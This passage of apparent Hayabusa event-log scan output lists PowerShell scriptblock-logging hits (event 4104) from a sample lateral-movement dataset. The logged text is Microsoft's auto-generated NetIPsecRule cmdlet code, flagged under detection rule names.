'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, 